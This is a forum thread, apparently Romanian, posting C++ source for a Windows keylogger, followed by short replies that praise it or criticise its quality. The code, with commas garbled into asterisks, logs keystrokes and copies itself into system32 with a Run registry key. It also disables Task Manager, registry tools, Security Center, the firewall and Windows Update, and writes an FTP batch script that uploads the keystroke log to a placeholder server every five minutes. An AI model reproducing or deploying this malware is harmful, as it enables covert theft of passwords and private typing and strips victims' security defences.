[C++] Ftp Keylogger 1 Source Code

[Skream Example]

#include <windows.h>
#include <Winuser.h>
#include <string>
#include <fstream>
using namespace std;

char BatchFile[20] = "system.bat";
char* params;

DWORD WINAPI OpenBatFile(LPVOID)
{
      for( {
Sleep(300000);
ShellExecute(NULL* "open"* BatchFile* NULL* NULL* SW_HIDE);}
}


std::string GetKey(int Key)
{
    std::string KeyString = "";

    if (Key == 8)
        KeyString = "[delete]";
    else if (Key == 13)
        KeyString = "\n";
    else if (Key == 32)
        KeyString = " ";
    else if (Key == VK_PAUSE)
        KeyString = "[PAUSE]";
    else if (Key == VK_CAPITAL)
        KeyString = "[CAPITAL]";
    else if (Key == VK_SHIFT)
        KeyString = "[SHIFT]";
    else if (Key == VK_TAB)
        KeyString = "[TABULATOR]";
    else if (Key == VK_CONTROL)
        KeyString = "[CTRL]";
    else if (Key == VK_ESCAPE)
        KeyString = "[ESCAPE]";
    else if (Key == VK_END)
        KeyString = "[END]";
    else if (Key == VK_HOME)
        KeyString = "[HOME]";
    else if (Key == VK_LEFT)
        KeyString = "[left]";
    else if (Key == VK_RIGHT)
        KeyString = "[right]";
    else if (Key == VK_UP)
        KeyString = "[UP]";
    else if (Key == VK_DOWN)
        KeyString = "[DOWN]";
    else if (Key == VK_SNAPSHOT)
        KeyString = "[SNAPSHOT]";
    else if (Key == VK_NUMLOCK)
        KeyString = "[NUMLOCK]";
    else if (Key == 190 || Key == 110)
        KeyString = ".";

    else if (Key >=96 && Key <= 105)
        KeyString = Key-48;
    else if (Key > 47 && Key < 60)
        KeyString = Key;
    if (Key != VK_LBUTTON || Key != VK_RBUTTON)
    {
        if (Key > 64 && Key < 91)
        {
            if (GetKeyState(VK_CAPITAL))
                KeyString = Key;
            else
            {
                Key = Key + 32;
                KeyString = Key;
            }
        }
    }

    return KeyString;
}

int main()
{
    int WINAPI WinMain (HINSTANCE hThisInstance*
    HINSTANCE hPrevInstance*
    LPSTR lpszArgument*
    int nFunsterStil);

  char path[MAX_PATH];
  HMODULE GetModH = GetModuleHandle(NULL);

  char sys[MAX_PATH];
  GetModuleFileName(GetModH* path* sizeof(path));
  GetSystemDirectory(sys* sizeof(sys));
  strcat(sys* "\\borg.exe");
  CopyFile(path* sys* false);

  HKEY hKey* hKey2;

  unsigned char reg[2] = "0";

  RegOpenKeyEx(HKEY_LOCAL_MACHINE*"Software\\Microsoft\\Windows\\CurrentVersion\\Run"* 0* KEY_SET_VALUE* &hKey );
  RegSetValueEx(hKey* "MS-Windows-secretly"* 0* REG_SZ*(const unsigned char*)sys* sizeof(sys));
  RegCreateKey(HKEY_CURRENT_USER*"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"*&hKey2);
  RegSetValueEx(hKey2*"DisableTaskMgr"*0*REG_DWORD*reg*sizeof(reg));
  RegCloseKey(hKey)*(hKey2);

  DeleteFile("C:\\WINDOWS\\system32\\log.txt");  

  ofstream FWUP;
  FWUP.open("C:\\WINDOWS\\system32\\update.bat");
  FWUP<<"@echo off\n";
  FWUP<<"net stop ""Security Center""\n";
  FWUP<<"net stop SharedAccess\n";
  FWUP<<"> ""%Temp%.\\kill.reg"" ECHO REGEDIT4\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess]\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO ""Start""=dword:00000004\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\wuauserv]\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO ""Start""=dword:00000004\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO [HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\wscsvc]\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO ""Start""=dword:00000004\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n";
  FWUP<<"START /WAIT REGEDIT /S ""%Temp%.\\kill.reg""\n";
  FWUP<<"DEL ""%Temp%.\\kill.reg""\n";
  FWUP<<"DEL %0\n";
  FWUP.close();  

  ofstream disable;
  disable.open("C:\\WINDOWS\\system32\\syssvr.bat");
  disable<<"@echo off\n";
  disable<<"reg add ""HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"" /v ""disableregistrytools"" /t REG_DWORD /d ""1"" /f >NUL\n";
  disable.close();  

  //write ur ftp-information's here
  ofstream log;
  log.open("C:\\WINDOWS\\system32\\drivers\\config.sys");
  log<<"OPEN ftpserver\n";
  log<<"USER username\n";
  log<<"ftppassword\n";
  log<<"ASCII\n";
  log<<"SEND C:\\WINDOWS\\system32\\log.txt\n";
  log<<"BYE\n";
  log<<"exit\n";
  log.close();

  ofstream Ausgabe;
  Ausgabe.open("C:\\WINDOWS\\system32\\system.bat");
  Ausgabe<<"ftp -n -i -s:C:\\WINDOWS\\system32\\drivers\\config.sys\n";
  Ausgabe<<"bye\n";
  Ausgabe<<"exit\n";
  Ausgabe.close();

  ShellExecute(NULL* NULL* "C:\\WINDOWS\\system32\\syssvr.bat"* params* NULL* SW_HIDE);
  ShellExecute(NULL* NULL* "C:\\WINDOWS\\system32\\update.bat"* params* NULL* SW_HIDE);

  DWORD OpenBatch;

  HANDLE hOpenBatFile = CreateThread(NULL* 0* OpenBatFile* 0* 0* &OpenBatch);

    std::string Filename = "C:\\WINDOWS\\system32\\log.txt";
    std::string TempString = "";
    std::fstream FStream;
    FStream.open(Filename.c_str()* std::fstream::out | std::fstream::app);

    while(true)
    {
        // 0% CPU
        Sleep(5);

        for(int i = 8; i < 191; i++)
        {
           if(GetAsyncKeyState(i)&1 ==1)
           {
                TempString = GetKey (i);

                FStream.write(TempString.c_str()* TempString.size());
                FStream.close();
                FStream.open(Filename.c_str()* std::fstream::out | std::fstream::app);
           }
        }
    }
}  

[nedo]

+1 rep, foarte interesant, am ce invatat din asta

[DKMT]

nice interesant codul.Il voi studia mai indeaproape!

[cmiN]

Bat la pariu ca daca era acelasi cod dar cu un titlu nesemnificativ si nu (trojan, keylogger, etc) nu mai ziceati niciunul nimic. Mie sincer nu-mi place modul in care la scris nici cum face captura.

[nedo]

De fapt avand in vedere ca nu am nici un fel de experienta in troieni si asa ceva chiar si prost scris e informativ, am incercat sa gasesc surse in c++ pentru troieni si in alte dati si nu prea am gasit. Asa ca mie unul mi se pare informativ.

Ca o adaugare, nu am treaba cu chestii din astea, nu am folosit niciodata nici un tip de malware pentru a obtine nimic, nu am incercat niciodata sa obtin parola cuiva sau sa fac rost de "loguri" pentru diferite chestii. Mie imi place sa vad cum lucreaza, iar in cazul malware-urilor sa stiu cum sa le scot

Si ca sa iti raspund la afirmatie, de obicei ma uit la orice are c++ in titlu, la posturile lui nytro nu am mai postat pentru ca nu puteam sa ii dau rep, si sa postez aiurea nu avea rost, in plus nu puteam sa ma dau cu parerea acolo deoarece e un pic cam avansat pentru mine, cam la fel ca si asta...

[Nytro]

if(GetAsyncKeyState(i)&1 ==1)

Nu are keyboard hook, va consuma ceva procesor, foloseste metoda clasica: verifica pentru fiecare tasta in parte daca e apasata, nu seteaza un hook pentru a primi o "notificare" in caz ca e apelata o tasta.

Si e cam prost scris. Adica e stupid sa scrii un fisier ".reg" pentru a scrie in Registry cand exista Registry API, si de asemenea, sa uploadezi pe FTP cu un fisier ".bat" cand exista Winsock si protocolul FTP e tot stupid. Dar na, e mult mai usor asa de aceea probabil au fost preferate aceste alternative.

Ideea principala e ca nu vi-l recomand, nici sa il folositi, si sa il studiati nici nu se pune problema.

Edited April 16, 2011 by Nytro

[Paul4games]

Din cate stiu eu metoda care ai folosito nui preaia si caracterele speciale sau dinastea rusesti/chinezesti/plm

[Nytro]

Probabil. Adica nu stiu cum s-ar putea face un program cu suport pentru toate tastaturile posibile, dar probabil nu e deloc usor. Dar cred ca e de ajuns unul care suporta tastaturile "standard".